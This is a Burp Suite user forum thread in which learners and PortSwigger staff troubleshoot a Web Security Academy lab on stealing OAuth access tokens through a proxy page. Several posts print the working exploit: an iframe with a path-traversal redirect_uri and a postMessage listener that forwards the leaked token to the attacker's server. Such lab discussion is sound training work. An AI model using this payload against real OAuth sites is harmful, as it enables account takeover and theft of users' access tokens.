Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Oauth lab: Can't complete Stealing OAuth access tokens via a proxy page lab

sanjogc | Last updated: Oct 22, 2022 04:30PM UTC

Hello Portswigger team. I am not able to complete the above lab.I tried the payload in the solutions. <iframe src="https://YOUR-LAB-AUTH-SERVER/auth?client_id=YOUR-LAB-CLIENT_ID&redirect_uri=https://YOUR-LAB-ID.web-security-academy.net/oauth-callback/../post/comment/comment-form&response_type=token&nonce=-1552239120&scope=openid%20profile%20email"></iframe> <script> window.addEventListener('message', function(e) { fetch("/" + encodeURIComponent(e.data.data)) }, false) </script> This payload almosts gets me the token in burpsuite but the browser is not cooperating. i understand the solution given.the comment-form will use postmessage to send message to the parent and we are listening for the event and sending the fragment to the exploit server. the firefox does not even send cookies to oauth server so i moved to burp browser. the burp browser does the iframe work but listener is not working..

sanjogc | Last updated: Oct 22, 2022 04:35PM UTC

the code inside script does not run. not even console.log()

sanjogc | Last updated: Oct 22, 2022 04:45PM UTC

sorry to disturb. the solution seems to be upside down. i just casually put the listener code above the iframe. it worked finally... is it just me who had this issue?

Ben, PortSwigger Agent | Last updated: Oct 24, 2022 01:02PM UTC

Hi, I have just run through this lab and have been able to solve it using the solution provided so it does appear to be working as expected. If it helps, the content of my exploit server was as follows: <iframe src="https://oauth-0a09007904283086c0572bcd02c900af.web-security-academy.net/auth?client_id=mcaunb0dt6vo606215jyh&redirect_uri=https://0a74004404f3307dc0c42b4000690037.web-security-academy.net/oauth-callback/../post/comment/comment-form&response_type=token&nonce=-1691750255&scope=openid%20profile%20email"></iframe> <script> window.addEventListener('message', function(e) { fetch("/" + encodeURIComponent(e.data.data)) }, false) </script>

Steven | Last updated: Feb 06, 2023 11:06PM UTC

Hello, I am having an issue with this lab as well. I followed the solution as written and when I view the exploit, instead of the comment page I get this error instead: SessionNotFound: invalid_request at Provider.getInteraction (/opt/node-v18.12.1-linux-x64/lib/node_modules/oidc-provider/lib/provider.js:50:11) at Provider.interactionDetails (/opt/node-v18.12.1-linux-x64/lib/node_modules/oidc-provider/lib/provider.js:228:27) at /home/carlos/oauth/index.js:160:34 at Layer.handle [as handle_request] (/opt/node-v18.12.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5) at next (/opt/node-v18.12.1-linux-x64/lib/node_modules/express/lib/router/route.js:137:13) at setNoCache (/home/carlos/oauth/index.js:121:5) at Layer.handle [as handle_request] (/opt/node-v18.12.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5) at next (/opt/node-v18.12.1-linux-x64/lib/node_modules/express/lib/router/route.js:137:13) at Route.dispatch (/opt/node-v18.12.1-linux-x64/lib/node_modules/express/lib/router/route.js:112:3) at Layer.handle [as handle_request] (/opt/node-v18.12.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5) I have cleared cookies and redid the lab several times and I get the same error. Any help would be appreciated!

Ben, PortSwigger Agent | Last updated: Feb 07, 2023 10:57AM UTC

Hi Steven, Are you able to provide a screenshot of the exploit that you have configured within the Exploit Server?

Bipin | Last updated: Dec 04, 2023 09:31AM UTC

Hello, I'm also getting the same SessionNotFound error, here's my code: <iframe src="https://oauth-0afb00e5043ee5b08080e70202b000d6.oauth-server.net/auth?client_id=hxolfwvj6keyhmt9legrv&redirect_uri=https://0ac40081042ae57780b6e96f0040004c.web-security-academy.net/oauth-callback/../post/comment/comment-form&response_type=token&nonce=-1457167127&scope=openid%20profile%20email" height="100%" width="100%"></iframe> <script> window.addEventListener('message', function(e) { fetch("/" + encodeURIComponent(e.data.data)) }, false) </script> and the error i'm getting is: SessionNotFound: invalid_request at Provider.getInteraction (/opt/node-v19.8.1-linux-x64/lib/node_modules/oidc-provider/lib/provider.js:50:11) at Provider.interactionDetails (/opt/node-v19.8.1-linux-x64/lib/node_modules/oidc-provider/lib/provider.js:228:27) at /home/carlos/oauth/index.js:160:34 at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5) at next (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:137:13) at setNoCache (/home/carlos/oauth/index.js:121:5) at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5) at next (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:137:13) at Route.dispatch (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:112:3) at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5)

Ben, PortSwigger Agent | Last updated: Dec 04, 2023 10:48AM UTC

Hi, Which browser are you using when you attempt to carry out this lab?

Nemeses5174 | Last updated: Mar 20, 2024 11:53AM UTC

Hi, I have the same problem. The "iframe" solution doesn't not work with proxy, it is necessary to user a proxy-free version of Chrome. I don't know why, someone has an idea? Thanks

Ben, PortSwigger Agent | Last updated: Mar 21, 2024 08:24AM UTC

Hi, It is possible that a flag that is enabled with the embedded browser is causing issues with this lab. Whilst we resolve this issues it does look as though using a normal version of Chrome should still allow you to solve this lab.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.